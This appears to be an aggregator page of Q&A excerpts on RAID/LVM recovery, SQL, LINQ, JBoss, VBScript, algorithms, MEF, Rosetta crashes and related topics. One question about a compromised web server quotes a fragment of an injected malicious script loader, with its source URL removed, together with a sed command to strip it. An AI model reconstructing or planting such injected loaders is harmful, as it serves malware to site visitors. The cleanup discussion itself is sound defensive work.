/dev/sda1. I use grub2 to boot the system off this partition. On top of this raid10 I installed two volume groups, one for /, one for /home. This system worked well, I even exchanged two disks during the last two years. It always worked. But not this time. For the first time, /dev/sda broke. I do not know if this is an issue – I know I would have struggled anyways to overcome the problem with /boot installed on that disk and grub2 installed on the mbr of /dev/sda. Anyways, I did what I always did: start knoppix fire up the raid sudo mdadm --examine -scan which returns ARRAY /dev/md127 UUID=0dbf4558:1a943464:132783e8:19cdff95 start it up sudo mdadm --assemble /dev/md127 fail the failing disk (smart event) sudo mdadm /dev/md127 --fail /dev/sda2 remove the failing disk sudo mdadm /dev/md127 --remove /dev/sda2 stop the raid sudo mdadm -S /dev/md127 take out the disk replace it with a new one create the same partitions as on the failling one add it to the raid sudo mdadm --assemble /dev/md127 sudo mdadm /dev/md127 --add /dev/sda2 wait 4 hours All looks fine: cat /proc/mdstat returns: Personalities : [raid10] md127 : active raid10 sda2[0] sdd1[3] sdc1[2] sdb1[1] 2910158464 blocks 64K chunks 2 near-copies [4/4] [UUUU] unused devices: <none> and sudo mdadm --detail /dev/md127 returns /dev/md127: Version : 0.90 Creation Time : Wed Jun 10 13:08:46 2009 Raid Level : raid10 Array Size : 2910158464 (2775.34 GiB 2980.00 GB) Used Dev Size : 1455079232 (1387.67 GiB 1490.00 GB) Raid Devices : 4 Total Devices : 4 Preferred Minor : 127 Persistence : Superblock is persistent Update Time : Thu Mar 21 16:27:40 2013 State : clean Active Devices : 4 Working Devices : 4 Failed Devices : 0 Spare Devices : 0 Layout : near=2 Chunk Size : 64K UUID : 0dbf4558:1a943464:132783e8:19cdff95 (local to host Microknoppix) Events : 0.4824680 Number Major Minor RaidDevice State 0 8 2 0 active sync /dev/sda2 1 8 17 1 active sync /dev/sdb1 2 8 33 2 active sync /dev/sdc1 3 8 49 3 active sync /dev/sdd1 However, there is no trace of the volume groups. Rebooting into knoppix does not help Restarting the old system (I actually replugged and re-added the failing disk for that – the system begins to start, but then fails to see the / partition – no wonder if the volume group is gone) does not help. sudo vgscan, sudo vgdisplay, sudo lvs, sudo lvdisplay, sudo vgscan –mknodes all returned No volume groups found. I am completely at a loss. Can anyone tell me if and how I can recover my data? Thanks in advance!

    Read the article

  • SQL to select random mix of rows fairly [migrated]

    - by Matt Sieker
    Here's my problem: I have a set of tables in a database populated with data from a client that contains product information. In addition to the basic product information, there is also information about the manufacturer, and categories for those products (a product can be in one or more categories). These categories are then referred to as "Product Categories", and which stores these products are available at. These tables are updated once a week from a feed from the customer. Since for our purposes, some of the product categories are the same, or closely related for our purposes, there is another level of categories called "General Categories", a general category can have one or more product categories. For the scope of these tables, here's some rough numbers: Data Tables: Products: 475,000 Manufacturers: 1300 Stores: 150 General Categories: 245 Product Categories: 500 Mapping Tables: Product Category -> Product: 655,000 Stores -> Products: 50,000,000 Now, for the actual problem: As part of our software, we need to select n random products, given a store and a general category. However, we also need to ensure a good mix of manufacturers, as in some categories, a single manufacturer dominates the results, and selecting rows at random causes the results to strongly favor that manufacturer. The solution that is currently in place, works for most cases, involves selecting all of the rows that match the store and category criteria, partition them on manufacturer, and include their row number from within their partition, then select from that where the row number for that manufacturer is less than n, and use ROWCOUNT to clamp the total rows returned to n. This query looks something like this: SET ROWCOUNT 6 select p.Id, GeneralCategory_Id, Product_Id, ISNULL(m.DisplayName, m.Name) AS Vendor, MSRP, MemberPrice, FamilyImageName from (select p.Id, gc.Id GeneralCategory_Id, p.Id Product_Id, ctp.Store_id, Manufacturer_id, ROW_NUMBER() OVER (PARTITION BY Manufacturer_id ORDER BY NEWID()) AS 'VendorOrder', MSRP, MemberPrice, FamilyImageName from GeneralCategory gc inner join GeneralCategoriesToProductCategories gctpc ON gc.Id=gctpc.GeneralCategory_Id inner join ProductCategoryToProduct pctp on gctpc.ProductCategory_Id = pctp.ProductCategory_Id inner join Product p on p.Id = pctp.Product_Id inner join StoreToProduct ctp on p.Id = ctp.Product_id where gc.Id = @GeneralCategory and ctp.Store_id=@StoreId and p.Active=1 and p.MemberPrice >0) p inner join Manufacturer m on m.Id = p.Manufacturer_id where VendorOrder <=6 order by NEWID() SET ROWCOUNT 0 (I've tried to somewhat format it to make it cleaner, but I don't think it really helps) Running this query with an execution plan shows that for the majority of these tables, it's doing a Clustered Index Seek. There are two operations that take up roughly 90% of the time: Index Seek (Nonclustered) on StoreToProduct: 17%. This table just contains the key of the store, and the key of the product. It seems that NHibernate decided not to make a composite key when making this table, but I'm not concerned about this at this point, as compared to the other seek... Clustered Index Seek on Product: 69%. I really have no clue how I could make this one more performant. On categories without a lot of products, performance is acceptable (<50ms), however larger categories can take a few hundred ms, with the largest category taking 3s (which has about 170k products). It seems I have two ways to go from this point: Somehow optimize the existing query and table indices to lower the query time. As almost every expensive operation is already a clustered index scan, I don't know what could be done there. The inner query could be tuned to not return all of the possible rows for that category, but I am unsure how to do this, and maintain the requirements (random products, with a good mix of manufacturers) Denormalize this data for the purpose of this query when doing the once a week import. However, I am unsure how to do this and maintain the requirements. Does anyone have any input on either of these items?

    Read the article

  • Update XML element with LINQ to XML in VB.NET

    - by Bayonian
    Hi, I'm trying to update an element in the XML document below: Here's the code: Dim xmldoc As XDocument = XDocument.Load(theXMLSource1) Dim ql As XElement = (From ls In xmldoc.Elements("LabService") _ Where CType(ls.Element("ServiceType"), String).Equals("Scan") _ Select ls.Element("Price")).FirstOrDefault ql.SetValue("23") xmldoc.Save(theXMLSource1) Here's the XML file: <?xml version="1.0" encoding="utf-8"?> <!--Test XML with LINQ to XML--> <LabSerivceInfo> <LabService> <ServiceType>Copy</ServiceType> <Price>1</Price> </LabService> <LabService> <ServiceType>PrintBlackAndWhite</ServiceType> <Price>2</Price> </LabService> </LabSerivceInfo> But, I got this error message: Object reference not set to an instance of an object. Exception Details: System.NullReferenceException: Object reference not set to an instance of an object. Error line:ql.SetValue("23") Can you show me what the problem is? Thank you.

    Read the article

  • Code Golf: Code 39 Bar Code

    - by gwell
    The challenge The shortest code by character count to draw an ASCII representation of a Code 39 bar code. Wikipedia article about Code 39: http://en.wikipedia.org/wiki/Code_39 Input The input will be a string of legal characters for Code 39 bar codes. This means 43 characters are valid: 0-9 A-Z (space) and -.$/+%. The * character will not appear in the input as it is used as the start and stop characters. Output Each character encoded in Code 39 bar codes have nine elements, five bars and four spaces. Bars will be represented with # characters, and spaces will be represented with the space character. Three of the nine elements will be wide. The narrow elements will be one character wide, and the wide elements will be three characters wide. A inter-character space of a single space should be added between each character pattern. The pattern should be repeated so that the height of the bar code is eight characters high. The start/stop character * (bWbwBwBwb) would be represented like this: # # ### ### # # # ### ### # # # ### ### # # # ### ### # # # ### ### # # # ### ### # # # ### ### # # # ### ### # ^ ^ ^^ ^ ^ ^ ^^^ | | || | | | ||| narrow bar -+ | || | | | ||| wide space ---+ || | | | ||| narrow bar -----+| | | | ||| narrow space ------+ | | | ||| wide bar --------+ | | ||| narrow space ----------+ | ||| wide bar ------------+ ||| narrow space --------------+|| narrow bar ---------------+| inter-character space ----------------+ The start and stop character * will need to be output at the start and end of the bar code. No quiet space will need to be included before or after the bar code. No check digit will need to be calculated. Full ASCII Code39 encoding is not required, just the standard 43 characters. No text needs to be printed below the ASCII bar code representation to identify the output contents. The character # can be replaced with another character of higher density if wanted. Using the full block character U+2588, would allow the bar code to actually scan when printed. Test cases Input: ABC Output: # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # # # ### ### # ### # # # ### # ### # # ### ### ### # # # # # ### ### # Input: 1/3 Output: # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # # # ### ### # ### # # # ### # # # # # ### ### # # # # # ### ### # Input: - $ (minus space dollar) Output: # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # # # ### ### # # # # ### ### # ### # ### # # # # # # # # ### ### # Code count includes input/output (full program).

    Read the article

  • Jboss Error-Cannot process metadata

    - by Nila
    Hi! I'm trying to implement stateless session bean ejb3 in jboss5 using netbeans6.8 as a editor. When I tried deploying my application, I'm getting the following error. What is the issue with this? 17:45:04,901 ERROR [AbstractKernelController] Error installing to PostClassLoader: name=vfszip:/E:/Shalini/jboss-5.1.0.GA/server/default/deploy/InsighIT1.1-ejb.jar/ state=ClassLoader mode=Manual requiredState=PostClassLoader org.jboss.deployers.spi.DeploymentException: Cannot process metadata at org.jboss.deployers.spi.DeploymentException.rethrowAsDeploymentException(DeploymentException.java:49) at org.jboss.deployment.AnnotationMetaDataDeployer.deploy(AnnotationMetaDataDeployer.java:181) at org.jboss.deployment.AnnotationMetaDataDeployer.deploy(AnnotationMetaDataDeployer.java:93) at org.jboss.deployers.plugins.deployers.DeployerWrapper.deploy(DeployerWrapper.java:171) at org.jboss.deployers.plugins.deployers.DeployersImpl.doDeploy(DeployersImpl.java:1439) at org.jboss.deployers.plugins.deployers.DeployersImpl.doInstallParentFirst(DeployersImpl.java:1157) at org.jboss.deployers.plugins.deployers.DeployersImpl.doInstallParentFirst(DeployersImpl.java:1210) at org.jboss.deployers.plugins.deployers.DeployersImpl.install(DeployersImpl.java:1098) at org.jboss.dependency.plugins.AbstractControllerContext.install(AbstractControllerContext.java:348) at org.jboss.dependency.plugins.AbstractController.install(AbstractController.java:1631) at org.jboss.dependency.plugins.AbstractController.incrementState(AbstractController.java:934) at org.jboss.dependency.plugins.AbstractController.resolveContexts(AbstractController.java:1082) at org.jboss.dependency.plugins.AbstractController.resolveContexts(AbstractController.java:984) at org.jboss.dependency.plugins.AbstractController.change(AbstractController.java:822) at org.jboss.dependency.plugins.AbstractController.change(AbstractController.java:553) at org.jboss.deployers.plugins.deployers.DeployersImpl.process(DeployersImpl.java:781) at org.jboss.deployers.plugins.main.MainDeployerImpl.process(MainDeployerImpl.java:702) at org.jboss.system.server.profileservice.repository.MainDeployerAdapter.process(MainDeployerAdapter.java:117) at org.jboss.system.server.profileservice.hotdeploy.HDScanner.scan(HDScanner.java:362) at org.jboss.system.server.profileservice.hotdeploy.HDScanner.run(HDScanner.java:255) at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:441) at java.util.concurrent.FutureTask$Sync.innerRunAndReset(FutureTask.java:317) at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:150) at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$101(ScheduledThreadPoolExecutor.java:98) at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.runPeriodic(ScheduledThreadPoolExecutor.java:181) at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:205) at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:885) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:907) at java.lang.Thread.run(Thread.java:619) Caused by: java.lang.ClassNotFoundException: tomcat.Main from BaseClassLoader@1d6d136{VFSClassLoaderPolicy@41312b{name=vfszip:/E:/hh/jboss-5.1.0.GA/server/default/deploy/InsighIT1.1-ejb.jar/

    Read the article

  • Vbscript - Checking each subfolder for files and copy files

    - by Kenny Bones
    I'm trying to get this script to work. It's basically supposed to mirror two sets of folders and make sure they are exactly the same. If a folder is missing, the folder and it's content should be copied. Then the script should compare the DateModified attribute and only copy the files if the source file is newer than the destination file. I'm trying to get together a script that does exactly that. And so far I've been able to check all subfolder if they exist and then create them if they don't. Then I've been able to scan the top source folder for it's files and copy them if they don't exist or if the DateModified attribute is newer on the source file. What remains is basically scanning each subfolder for its files and copy them if they don't exist or if the DateModified stamp is newer. Here's the code: Dim strSourceFolder, strDestFolder strSourceFolder = "c:\users\vegsan\desktop\Source\" strDestFolder = "c:\users\vegsan\desktop\Dest\" Set fso = CreateObject("Scripting.FileSystemObject") Set objTopFolder = fso.GetFolder(strSourceFolder) Set colTopFiles = objTopFolder.Files 'Check to see if subfolders actually exist. Create if they don't Set objColFolders = objTopFolder.SubFolders For Each subFolder in objColFolders CheckFolder subFolder, strSourceFolder, strDestFolder Next ' Check all files in first top folder For Each objFile in colTopFiles CheckFiles objFile, strSourceFolder, strDestFolder Next Sub CheckFolder (strSubFolder, strSourceFolder, strDestFolder) Set fso = CreateObject("Scripting.FileSystemObject") Dim folderName, aSplit aSplit = Split (strSubFolder, "\") UBound (aSplit) If UBound (aSplit) > 1 Then folderName = aSplit(UBound(aSplit)) folderName = strDestFolder & folderName End if If Not fso.FolderExists(folderName) Then fso.CreateFolder(folderName) End if End Sub Sub CheckFiles (file, SourceFolder, DestFolder) Set fso = CreateObject("Scripting.FileSystemObject") Dim DateModified DateModified = file.DateLastModified ReplaceIfNewer file, DateMofidied, SourceFolder, DestFolder End Sub Sub ReplaceIfNewer (sourceFile, DateModified, SourceFolder, DestFolder) Const OVERWRITE_EXISTING = True Dim fso, objFolder, colFiles, sourceFileName, destFileName Dim DestDateModified, objDestFile Set fso = CreateObject("Scripting.FileSystemObject") sourceFileName = fso.GetFileName(sourceFile) destFileName = DestFolder & sourceFileName if Not fso.FileExists(destFileName) Then fso.CopyFile sourceFile, destFileName End if if fso.FileExists(destFileName) Then Set objDestFile = fso.GetFile(destFileName) DestDateModified = objDestFile.DateLastModified if DateModified <> DestDateModified Then fso.CopyFile sourceFile, destFileName End if End if End Sub

    Read the article

  • Find the "largest" dense sub matrix in a large sparse matrix

    - by BCS
    Given a large sparse matrix (say 10k+ by 1M+) I need to find a subset, not necessarily continuous, of the rows and columns that form a dense matrix (all non-zero elements). I want this sub matrix to be as large as possible (not the largest sum, but the largest number of elements) within some aspect ratio constraints. Are there any known exact or aproxamate solutions to this problem? A quick scan on Google seems to give a lot of close-but-not-exactly results. What terms should I be looking for? edit: Just to clarify; the sub matrix need not be continuous. In fact the row and column order is completely arbitrary so adjacency is completely irrelevant. A thought based on Chad Okere's idea Order the rows from largest count to smallest count (not necessary but might help perf) Select two rows that have a "large" overlap Add all other rows that won't reduce the overlap Record that set Add whatever row reduces the overlap by the least Repeat at #3 until the result gets to small Start over at #2 with a different starting pair Continue until you decide the result is good enough

    Read the article

  • Recover files from corrupt filesystem

    - by Emile 81
    My situation: I have an older 80GB IDE internal hdd, with a few files on that I would like very much to recover: some word documents some latex documents (text files) and pictures (png, jpg, eps files) some other text documents and visual studio project files I had backed them (not the latex ones though) up using svn, but have not committed lately, and would loose a lot of work if I cant recover. the hdd seems to have lost its filesystem, i have no idea how it came about. I know it has/had 3 NTFS partitions, i know the files i want are on the second or third partition. I read http://superuser.com/questions/81877/recover-hard-disk-data Partition Find and Mount did not see all the partitions using intelligent scan TestDisk does (i think), I followed the step by step instructions here, but when I try to list the files it says: "Can't open filesystem, filesystem seems damaged." I'm not sure how to proceed here, as TestDisks wiki does not contain this error message afaik. I don't know if the hdd is gonna fail, or some prog has caused the filesystem to be corrupt, the hdd doesnt make a sound, so i guess that's good. I would like some guidance so I don't accidentally cause more damage. (eg. is it ok to let testdisk write the filesystem to disk? I'm pretty the partitions are listed ok, but not 100%)

    Read the article

  • Finding if a Binary Tree is a Binary Search Tree

    - by dharam
    Today I had an interview where I was asked to write a program which takes a Binary Tree and returns true if it is also a Binary Search Tree otherwise false. My Approach1: Perform an inroder traversal and store the elements in O(n) time. Now scan through the array/list of elements and check if element at ith index is greater than element at (i+1)th index. If such a condition is encountered, return false and break out of the loop. (This takes O(n) time). At the end return true. But this gentleman wanted me to provide an efficient solution. I tried but I was unsuccessfult, because to find if it is a BST I have to check each node. Moreover he was pointing me to think over recusrion. My Approach 2: A BT is a BST if for any node N N-left is < N and N-right N , and the INorder successor of left node of N is less than N and the inorder successor of right node of N is greater than N and the left and right subtrees are BSTs. But this is going to be complicated and running time doesn't seem to be good. Please help if you know any optimal solution. Thanks.

    Read the article

  • Image Line Trace Math Help Hard To Explain

    - by Ozzy
    Hi all, sorry for the confusing title, its really hard for me to explain what i want. So i created this image :) Ok so the two RED dots are points on an image. The distance between them isnt important. What I want to do is, Using the coordinates for the two dots, work out the angle of the space between them (as shown by the black line between the red dots) Then once the angle is found, on the last red dot, create two points which cross the angle of the first line. Then from that, scan a Half semicircle and get the coordinates of every pixel of the image that the orange line passes. I dnot know if this makes any sense to you lot so i drew another picture: As you can see in the second picture, my idea is applied to a line drawn on a black canavs. The two red dots are the starting coordinates then at the end of the two dots, a less then half semicircle is created. The part that is orange shows the pixels of the image that should be recorded. I have no clue how to start this, so if anyone has any ideas on how i can or on what i need to do, any help is much appreciated :)

    Read the article

  • MEF = may experience frustration?

    - by Dave
    Well, it's not THAT bad yet. :) But I do have questions after Reed has pointed me at MEF as a potential alternative to IoC (and so far it does look pretty good). Consider the following model: As you can see, I have an App, and this app uses Plugins (whoops, missed that association!). Both the App and Plugins require usage of an object of type CandySettings, which is found in yet another assembly. I first tried to use the ComposeParts method in MEF, but the only way I could get this to work was to do something like this in the plugin code. var container = new CompositionContainer(); container.ComposeParts(this, new CandySettings()); But this doesn't make any sense, because why would I want to create the instance of CandySettings in the plugin? It should be in the App. But if I put it in the App code, then the Plugin doesn't magically figure out how to get at ICandySettings, even though I am using [Import] in the plugin, and [Export] in CandySettings. The way I did it was to use MEF's DirectoryCatalog, because this allows the plugin, when constructed, to scan all of the assemblies in the current folder and automagically import everything that is marked with the [Import] attribute. So it looks like this, and potentially in every plugin: var catalog = new DirectoryCatalog( "."); var container = new CompositionContainer( catalog); container.ComposeParts( this); This totally works great, but I can't help but think that this is not how MEF was intended to be used?

    Read the article

  • Best practice for defining CSS rules via JavaScript

    - by Tim Whitlock
    I'm loading a stylesheet that is only required when javascript is enabled. More to the point, it mustn't be present if JavaScript is disabled. I'm doing this as soon as possible (in the head) before any javascript libraries are loaded. (I'm loading all scripts as late as possible). The code for loading this stylesheet externally is simple, and looks like this: var el = document.createElement('link'); el.setAttribute('href','/css/noscript.css'); el.setAttribute('rel','stylesheet'); el.setAttribute('type','text/css'); document.documentElement.firstChild.appendChild(el); It's working fine, but all my CSS file contains at the moment is this: .noscript { display: none; } This doesn't really warrant loading a file, so I'm thinking of just defining the rule dynamically in JavaScript. What's best practice for this?. A quick scan of various techniques shows that it requires a fair bit of cross-browser hacking. P.S. pleeease don't post jQuery examples. This must be done with no libraries.

    Read the article

  • How do I debug a crash when I run my garbage-collected app in Rosetta?

    - by Rob Keniger
    I have a Universal app which is targeting 10.5 and which uses garbage collection. I am building for ppc, i386 and x86_64. I don't have access to a physical PowerPC machine so I am trying to use Rosetta to confirm that the PowerPC portion of the app works correctly. However, as soon as the app is launched in Rosetta it immediately crashes with the following crash log: Process: FooApp [91567] Path: /Users/rob/Development/src/FooApp/build/Release 64-bit/FooApp.app/Contents/MacOS/FooApp Identifier: com.companyX.FooApp Version: 0.9 (build d540e05) (2) Code Type: PPC (Translated) Parent Process: launchd [708] Date/Time: 2010-04-09 18:32:23.962 +1000 OS Version: Mac OS X 10.6.3 (10D573) Report Version: 6 Exception Type: EXC_CRASH (SIGTRAP) Exception Codes: 0x0000000000000000, 0x0000000000000000 Crashed Thread: 5 ...snip non-relevant threads... Thread 5 Crashed: 0 libSystem.B.dylib 0x8023656a __pthread_kill + 10 1 libSystem.B.dylib 0x80235e17 pthread_kill + 95 2 com.companyX.FooApp 0xb80bfb30 0xb8000000 + 785200 3 com.companyX.FooApp 0xb80c0037 0xb8000000 + 786487 4 com.companyX.FooApp 0xb80dd8e8 0xb8000000 + 907496 5 com.companyX.FooApp 0xb8145397 spin_lock_wrapper + 1791 6 com.companyX.FooApp 0xb801ceb7 0xb8000000 + 118455 I have used the Apple docs on debugging translated apps and the information on this page to attach gdb to the app when it's running in Rosetta. The app immediately breaks into the debugger upon launch: Program received signal SIGTRAP, Trace/breakpoint trap. [Switching to thread 15107] 0x9151fdd4 in auto_fatal () (gdb) bt #0 0x9151fdd4 in auto_fatal () #1 0x91536d84 in Auto::Thread::get_register_state () #2 0x915372f8 in Auto::Thread::scan_other_thread () #3 0x91529be4 in Auto::Zone::scan_registered_threads () #4 0x91539114 in Auto::MemoryScanner::scan_thread_ranges () #5 0x9153b000 in Auto::MemoryScanner::scan () #6 0x9153049c in Auto::Zone::collect () #7 0x915198f4 in auto_collect_internal () #8 0x9151a094 in auto_collection_work () #9 0x96687434 in _dispatch_call_block_and_release () #10 0x9668912c in _dispatch_queue_drain () #11 0x96689350 in _dispatch_queue_invoke () #12 0x966895c0 in _dispatch_worker_thread2 () #13 0x966896fc in _dispatch_worker_thread () #14 0x965a97e8 in _pthread_body () (gdb) I have no idea where to start with this. It looks like the Garbage Collector is failing very badly. Are garbage-collected PowerPC apps not supported in Rosetta? I can't see any mention of this limitation in the docs if so. Does anyone have any ideas?

    Read the article

  • Verifying regular expression for malware removal

    - by Legend
    Unfortunately, one of my web servers was compromised recently. I have two questions. Is there a way I can scan the downloaded directory for backdoors? Is there anything I can do to ensure that at least known vulnerabilities do not exist anymore? Secondly, the malware put up the following in all index.* files on my webserver: <script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',.... CODE DELETED FOR SAFETY.... );}} catch(e) {}</script> Obviously, this snippet seems to download some rogue file onto the user's machine. I downloaded an entire backup of the web server and am currently trying to remove this snippet from all file. For this I am doing: find ./ -name "index.*" -exec sed -i 's/<script>\/\*GNU GPL\*.*Hva23p3hnyirlpv7.*<\/script>//g' {} \; Just wanted to verify if this does the trick. I verified it with a few files but I want to be sure that this doesn't delete some valid code. Anyone suggests any other modifications?

    Read the article

  • FileSystem.GetFiles() + UnauthorizedAccessException error?

    - by OverTheRainbow
    Hello, It seems like FileSystem.GetFiles() is unable to recover from the UnauthorizedAccessException exception that .Net triggers when trying to access an off-limit directory. In this case, does it mean this class/method isn't useful when scanning a whole drive and I should use some other solution (in which case: Which one?)? Here's some code to show the issue: Private Sub bgrLongProcess_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles bgrLongProcess.DoWork Dim drive As DriveInfo Dim filelist As Collections.ObjectModel.ReadOnlyCollection(Of String) Dim filepath As String 'Scan all fixed-drives for MyFiles.* For Each drive In DriveInfo.GetDrives() If drive.DriveType = DriveType.Fixed Then Try 'How to handle "Access to the path 'C:\System Volume Information' is denied." error? filelist = My.Computer.FileSystem.GetFiles(drive.ToString, FileIO.SearchOption.SearchAllSubDirectories, "MyFiles.*") For Each filepath In filelist DataGridView1.Rows.Add(filepath.ToString, "temp") 'Trigger ProgressChanged() event bgrLongProcess.ReportProgress(0, filepath) Next filepath Catch Ex As UnauthorizedAccessException 'How to ignore this directory and move on? End Try End If Next drive End Sub Thank you. Edit: What about using a Try/Catch just to have GetFiles() fill the array, ignore the exception and just resume? Private Sub bgrLongProcess_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles bgrLongProcess.DoWork 'Do lengthy stuff here Dim filelist As Collections.ObjectModel.ReadOnlyCollection(Of String) Dim filepath As String filelist = Nothing Try filelist = My.Computer.FileSystem.GetFiles("C:\", FileIO.SearchOption.SearchAllSubDirectories, "MyFiles.*") Catch ex As UnauthorizedAccessException 'How to just ignore this off-limit directory and resume searching? End Try 'Object reference not set to an instance of an object For Each filepath In filelist bgrLongProcess.ReportProgress(0, filepath) Next filepath End Sub

    Read the article

  • shortest digest of a string

    - by meta
    [Description] Given a string of char type, find a shortest digest, which is defined as: a shortest sub-string which contains all the characters in the original string. [Example] A = "aaabedacd" B = "bedac" is the answer. [My solution] Define an integer table with 256 elements, which is used to record the occurring times for each kind of character in the current sub-string. Scan the whole string, statistic the total kinds of character in the given string by using the above table. Use two pointers, start, end, which are initially pointing to the start and (start + 1) of the given string. The current kinds of character is 1. Expand sub-string[start, end) at the end until it contains all kinds of character. Update the shortest digest if possible. Contract sub-string[start, end] at the start by one character each time, try to restore its digest property if necessary by step 4. The time cost is O(n), and the extra space cost is constant. Any better solution without extra space?

    Read the article

< Previous Page | 100 101 102 103 104 105 106 107 108 109 110 111  | Next Page >